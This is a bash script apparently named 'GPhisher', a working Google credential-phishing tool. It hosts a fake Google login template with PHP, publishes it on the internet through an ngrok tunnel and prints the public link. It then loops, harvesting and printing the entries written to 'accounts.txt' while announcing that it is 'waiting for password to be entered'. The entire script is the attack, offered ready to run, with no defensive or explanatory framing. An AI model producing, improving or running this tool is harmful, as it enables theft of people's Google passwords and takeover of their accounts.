#!/bin/bash

LOCAL_IP=$(hostname -I | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")

started_tool(){
	clear
	echo -e """\e[92m
   ____   ____    _       _         _                   
  / ___| |  _ \  | |__   (_)  ___  | |__     ___   _ __ 
 | |  _  | |_) | | '_ \  | | / __| | '_ \   / _ \ | '__|
 | |_| | |  __/  | | | | | | \__ \ | | | | |  __/ | |   
  \____| |_|     |_| |_| |_| |___/ |_| |_|  \___| |_|   
"""
}

on_exit(){
	echo -e "\e[1;31m\rThanks for using this tool"
	pkill ngrok
	pkill php
	exit
}


starting_animation(){
	for i in {1..8}; do
		i=$(expr 8 - $i)
		echo -e -n "\r\e[92mNgrok Starting in \e[1;34m$i"
		sleep 1
	done
	echo -e -n "\r\e[92m"
}
host_local_server(){
	php -S 0.0.0.0:5011 -t .google_template/ > /dev/null 2>&1 &
	echo -e "Local Server: \e[1;33mhttp://${LOCAL_IP}:5011"
}

host_local_on_ngrok(){
	./ngrok http 127.0.0.1:5011 > /dev/null 2>&1 &
	starting_animation
	ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
	echo -e "\e[92mNgrok Link: \e[1;33m$ngrok_url"
}

listen_for_requests(){
	if [ -f ".google_template/accounts.txt"  ]; then
		DATA="`cat .google_template/accounts.txt`"
		echo "${DATA}"
		rm ".google_template/accounts.txt"
	fi
}


trap 'on_exit' SIGINT

started_tool
host_local_server
host_local_on_ngrok
echo -e "\e[92mWaiting for password to be entered...\n\n"

while [ true ];
do
	listen_for_requests	
done
